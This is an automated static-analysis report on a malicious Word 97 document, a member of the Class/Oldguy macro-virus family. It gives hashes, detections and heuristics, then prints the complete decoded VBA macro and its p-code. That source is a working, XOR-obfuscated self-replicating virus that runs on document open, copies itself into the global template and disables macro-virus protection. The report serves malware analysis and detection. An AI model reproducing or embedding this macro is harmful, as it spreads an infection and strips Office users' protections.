Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ad18e8a297a62a6…

MALICIOUS

Office (OLE)

44.0 KB Created: 1999-12-23 18:22:00 Authoring application: Microsoft Word 8.0 First seen: 2015-10-03
MD5: d98929b038165fcddc39373d18914380 SHA-1: f8c0c1cd7cff11345f09803b9d6e9c3b48a64202 SHA-256: 1ad18e8a297a62a671b2415f25cb5869d712aab4c3578dd20b2bc03105c6750e
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The critical heuristics indicate that the macros are designed for self-replication and AV tampering, suggesting a trojanized document. The Document_Open macro is present, which is a common execution vector for malicious VBA.

Heuristics 4

  • ClamAV: Doc.Trojan.Oldguy-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Oldguy-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    For Éo¥»ßû = 11 To 28: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Éo¥»ßû, ªÎÞþÐí(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Éo¥»ßû, 1), 2), ¤éÄù¼ò): Next: £îñ3zêrð
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8140 bytes
SHA-256: b3e3800baf91076bb0a574be574951e0f5cf91ce12b9da9d6703540e53581ebd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù
Private Sub Document_Open()
On Error Resume Next
¤éÄù¼ò = 153
For Éo¥»ßû = 11 To 28: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Éo¥»ßû, ªÎÞþÐí(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Éo¥»ßû, 1), 2), ¤éÄù¼ò): Next: £îñ3zêrð
End Sub
Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò)
For Éo¥»ßû = 1 To Len(¢UøòçÞ): ªÎÞþÐí = ªÎÞþÐí & Chr(Asc(Mid(¢UøòçÞ, Éo¥»ßû, 1)) Xor ¤éÄù¼ò): Next
End Function
Private Sub £îñ3zêrð()
'=p]`%k¹¤¹¨­©¹²¹Ð÷í±Ë÷ý¹³¹«ª°
'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹­µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k
'ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡
'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°
'×üáí
'Öéíðö÷ê·ÏðëìêÉëöíüúíðö÷¹¤¹ßøõêü£¹Öéíðö÷ê·Êøïü×öëôøõÉëöôéí¹¤¹ßøõêü
'Øééõðúøíðö÷·Ü÷øûõüÚø÷úüõÒü๤¹îýÚø÷úüõÝðêøûõüý
'Øééõðúøíðö÷·ÝðêéõøàÊíøíìêÛøë¹¤¹ßøõêü
'ÍñðêÝöúìôü÷í·Êøïü
'Ðÿ¹ÔøúëöÚö÷íøð÷ü빤¹×öëôøõÍüôéõøíü¹Íñü÷¹Êüí¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Üõêü¹Êüí¹j5D~êerC¹¤¹×öëôøõÍüôéõøíü
'Êüí¹j5D~êe¹¤¹j5D~êerC·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü
'Ðÿ¹j5D~êe·Õð÷ü걨µ¹¨°¹¥§¹»¾^
'j5D~êe·ýüõüíüõð÷ü깨µ¹j5D~êe·úöì÷íöÿõð÷üê
'j5D~êe·ð÷êüëíõð÷ü깨µ¹ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷ü걨µ¹ª«°
'Ðÿ¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Íñü÷¹ØúíðïüÝöúìôü÷í·Êøïü
'Ü÷ý¹Ðÿ
'Îðíñ¹Ýðøõöþê±îýÝðøõöþßðõüÊìôôøëàÐ÷ÿö°£¹·Íðíõü¹¤¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë껣¹·Øìíñö빤¹»üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü»£¹·Úöôôü÷í깤¹»ýö¹àöì¹ò÷öî¹îñö¹ð¹øô¦»£¹·Üáüúìíü£¹Ü÷ý¹Îðíñ
'Ðÿ¹Ýøà±×öî°¹¤¹«ª¹Íñü÷¹Êüõüúíðö÷·ÍàéüÍüáí¹±»úõøêê·êøôéõü¹ûà¹üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü·»¹¿¹ïûÚ빿¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë긻°
End Sub
'Class.sample by emanuel g0ldstein
'Old guy with new name ;) Don't get me wrong!
'Do not spread this shit!


' Processing file: /opt/analyzer/scan_staging/905a324ce67a4f8dadb298139f2a8de7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 12006 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0018 "Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0099 
' 	St ¤éÄù¼ò 
' Line #4:
' 	StartForVariable 
' 	Ld Éo¥»ßû 
' 	EndForVariable 
' 	LitDI2 0x000B 
' 	LitDI2 0x001C 
' 	For 
' 	BoS 0x0000 
' 	Ld Éo¥»ßû 
' 	Ld Éo¥»ßû 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	Ld ¤éÄù¼ò 
' 	ArgsLd ªÎÞþÐí 0x0002 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	ArgsCall £îñ3zêrð 0x0000 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò, id_FFFE As Variant))
' Line #7:
' 	StartForVariable 
' 	Ld Éo¥»ßû 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ¢UøòçÞ 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld ªÎÞþÐí 
' 	Ld ¢UøòçÞ 
' 	Ld Éo¥»ßû 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld ¤éÄù¼ò 
' 	Xor 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St ªÎÞþÐí 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' Line #8:
' 	EndFunc 
' Line #9:
' 	FuncDefn (Private Sub £îñ3zêrð())
' Line #10:
' 	QuoteRem 0x0000 0x001C "=p]`%k¹¤¹¨­©¹²¹Ð÷í±Ë÷ý¹³¹«ª°"
' Line #11:
' 	QuoteRem 0x0000 0x0055 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹­µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k"
' Line #12:
' 	QuoteRem 0x0000 0x0015 "ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡"
' Line #13:
' 	QuoteRem 0x0000 0x00A2 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°"
' Line #14:
' 	QuoteRem 0x0000 0x0004 "×üáí"
' Line #15:
' 	QuoteRem 0x0000 0x0041 "Öéíðö÷ê·ÏðëìêÉëöíüúíðö÷¹¤¹ßøõêü£¹Öéíðö÷ê·Êøïü×öëôøõÉëöôéí¹¤¹ßøõêü"
' Line #16:
' 	QuoteRem 0x0000 0x002E "Øééõðúøíðö÷·Ü÷øûõüÚø÷úüõÒü๤¹îýÚø÷úüõÝðêøûõüý"
' Line #17:
' 	QuoteRem 0x0000 0x0024 "Øééõðúøíðö÷·ÝðêéõøàÊíøíìêÛøë¹¤¹ßøõêü"
' Line #18:
' 	QuoteRem 0x0000 0x0011 "ÍñðêÝöúìôü÷í·Êøïü"
' Line #19:
' 	QuoteRem 0x0000 0x0068 "Ðÿ¹ÔøúëöÚö÷íøð÷ü빤¹×öëôøõÍüôéõøíü¹Íñü÷¹Êüí¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Üõêü¹Êüí¹j5D~êerC¹¤¹×öëôøõÍüôéõøíü"
' Line #20:
' 	QuoteRem 0x0000 0x003A "Êüí¹j5D~êe¹¤¹j5D~êerC·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü"
' Line #21:
' 	QuoteRem 0x0000 0x001C "Ðÿ¹j5D~êe·Õð÷ü걨µ¹¨°¹¥§¹»¾^"
' Line #22:
' 	QuoteRem 0x0000 0x0029 "j5D~êe·ýüõüíüõð÷ü깨µ¹j5D~êe·úöì÷íöÿõð÷üê"
' Line #23:
' 	QuoteRem 0x0000 0x0054 "j5D~êe·ð÷êüëíõð÷ü깨µ¹ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷ü걨µ¹ª«°"
' Line #24:
' 	QuoteRem 0x0000 0x0035 "Ðÿ¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Íñü÷¹ØúíðïüÝöúìôü÷í·Êøïü"
' Line #25:
' 	QuoteRem 0x0000 0x0006 "Ü÷ý¹Ðÿ"
' Line #26:
' 	QuoteRem 0x0000 0x00B6 "Îðíñ¹Ýðøõöþê±îýÝðøõöþßðõüÊìôôøëàÐ÷ÿö°£¹·Íðíõü¹¤¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë껣¹·Øìíñö빤¹»üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü»£¹·Úöôôü÷í깤¹»ýö¹àöì¹ò÷öî¹îñö¹ð¹øô¦»£¹·Üáüúìíü£¹Ü÷ý¹Îðíñ"
' Line #27:
' 	QuoteRem 0x0000 0x0088 "Ðÿ¹Ýøà±×öî°¹¤¹«ª¹Íñü÷¹Êüõüúíðö÷·ÍàéüÍüáí¹±»úõøêê·êøôéõü¹ûà¹üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü·»¹¿¹ïûÚ빿¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë긻°"
' Line #28:
' 	EndSub 
' Line #29:
' 	QuoteRem 0x0000 0x0021 "Class.sample by emanuel g0ldstein"
' Line #30:
' 	QuoteRem 0x0000 0x002C "Old guy with new name ;) Don't get me wrong!"
' Line #31:
' 	QuoteRem 0x0000 0x0018 "Do not spread this shit!"
' Line #32: